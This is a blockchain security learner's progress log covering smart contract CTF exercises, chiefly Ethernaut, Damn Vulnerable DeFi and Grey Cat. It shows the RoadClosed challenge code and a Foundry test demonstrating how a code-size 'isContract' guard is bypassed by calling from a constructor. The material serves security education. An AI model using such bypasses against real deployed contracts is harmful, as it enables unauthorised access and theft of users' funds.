timezone |
---|
Asia/Taipei |
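- Self-introduction
  SunSec, Founder of DeFiHackLabs. Dedicated to security education and to improving the security of the blockchain ecosystem.
- Do you think you will complete this intensive co-learning? 85% likely, unless too many ad hoc tasks come up XD. Most of my time will go to helping everyone complete the co-learning.

Learning content:
- Series A: Ethernaut CTF, mostly done previously. POC: ethernaut-foundry-solutions
- Series A: the QuillAudit CTF challenge website has been shut down. I collected the challenges for everyone, but a few are still missing. Anyone who finds them can post them.
- Series A: DamnVulnerableDeFi is still being updated, and the challenges are good. Damn Vulnerable DeFi.
- Use Foundry to solve the challenges locally; see RoadClosed below as an example.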
```bash
forge test --match-test testRoadClosedExploit -vvvv
```
```solidity
function addToWhitelist(address addr) public {
    require(!isContract(addr), "Contracts are not allowed");
    whitelistedMinters[addr] = true;
}

function changeOwner(address addr) public {
    require(whitelistedMinters[addr], "You are not whitelisted");
    require(msg.sender == addr, "address must be msg.sender");
    require(addr != address(0), "Zero address");
    owner = addr;
}

function pwn(address addr) external payable {
    require(!isContract(msg.sender), "Contracts are not allowed");
    require(msg.sender == addr, "address must be msg.sender");
    require(msg.sender == owner, "Must be owner");
    hacked = true;
}

function pwn() external payable {
    require(msg.sender == pwner);
    hacked = true;
}
```
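- Solving this challenge requires becoming the contract's owner and setting hacked = true.
- On-chain: it can be solved with `cast send` or `forge script`.
- Local: `forge test` is normally used to solve challenges locally, which makes debugging easier.
- Using RoadClosed as the example, I wrote 2 solutions: testRoadClosedExploit and testRoadClosedContractExploit (the challenge checks whether msg.sender is a contract, so isContract can be bypassed through the constructor).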
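Why the isContract guard in RoadClosed is not a reliable control, shown as an added Foundry test that is not part of the original notes or of the challenge repository. `Guarded`, `Probe` and the test names are constructed stand-ins, and the guard is assumed to be the usual code-size check, since the page does not show the body of `isContract`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import "forge-std/Test.sol";

// Constructed stand-in for the challenge's guard (assumption: code-size check).
contract Guarded {
    mapping(address => bool) public whitelisted;

    function isContract(address a) public view returns (bool) {
        // EXTCODESIZE is 0 while `a` is still executing its constructor.
        return a.code.length > 0;
    }

    function addToWhitelist(address a) external {
        require(!isContract(a), "Contracts are not allowed");
        whitelisted[a] = true;
    }
}

// Calls the guard from its constructor, before its runtime code is stored.
contract Probe {
    constructor(Guarded g) {
        g.addToWhitelist(address(this));
    }
}

contract IsContractGuardTest is Test {
    Guarded g;

    function setUp() public {
        g = new Guarded();
    }

    // The guard accepted an address that turns out to be a contract.
    function testConstructorCallPassesGuard() public {
        Probe p = new Probe(g);
        assertTrue(g.whitelisted(address(p)));
        assertTrue(g.isContract(address(p)));
    }

    // Once deployed, the same address is rejected by the same check.
    function testDeployedContractIsRejected() public {
        Probe p = new Probe(g);
        vm.expectRevert(bytes("Contracts are not allowed"));
        g.addToWhitelist(address(p));
    }
}
```

When auditing, treat any access decision that rests on a code-size check as unenforced, because the result depends on when the caller makes the call.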
- POC
- DamnVulnerableDeFi #1 Unstoppable
- DamnVulnerableDeFi #2 naive-receiver
- DamnVulnerableDeFi #3 Truster
- DamnVulnerableDeFi #4 Side Entrance
- DamnVulnerableDeFi #5 The Rewarder
- DamnVulnerableDeFi #6 Selfie
- DamnVulnerableDeFi #7 Compromised
- DamnVulnerableDeFi #8 Puppet
- DamnVulnerableDeFi #9 Puppet V2
- DamnVulnerableDeFi #10 Free Rider
- DamnVulnerableDeFi #11 Backdoor
- DamnVulnerableDeFi #12 Climber
- DamnVulnerableDeFi #13 Wallet Mining (not finished yet)
- DamnVulnerableDeFi #14 Puppet V3
- DamnVulnerableDeFi #15 ABI Smuggling
- DamnVulnerableDeFi #16 Shards
- DamnVulnerableDeFi #17 Curvy Puppet
- DamnVulnerableDeFi #18 Withdrawal
- DamnVulnerableDeFi Recap
- Grey Cat #1 GreyHats Dollar
- Grey Cat #2 Escrow
- Damn - Wallet Mining - create2 can be used to work out that the nonce of the user deposit wallet is 13.
- Damn - Curvy Puppet - After confirming with the author, the challenge is not broken. It requires multiple flash loans.
- DamnVulnerableDeFi #13 solved Wallet Mining
- Foundry computeCreate2Address.
- Create Safe wallet process.
- DamnVulnerableDeFi #17 solved Curvy Puppet. The writeup will be published at the very end, so everyone can experience how brutal it is first.
- ✅ Completed DamnVulnerableDeFi
- Grey Cat #3 Simple AMM Vault
- Grey Cat #4 Voting Vault
- Grey Cat #5 Meta Staking
- Grey Cat #6 Gnosis Unsafe
- Wrote two simple challenges as bonus questions for the bootcamp
- warroom-ethcc-2023#1 Proxy capture
- warroom-ethcc-2023#2 Flash loan
- warroom-ethcc-2023#3 Signature malleability
- warroom-ethcc-2023#4 Proxy capture
- warroom-ethcc-2023#5 Metamorphic
- Review 3 challenges from fuzzland.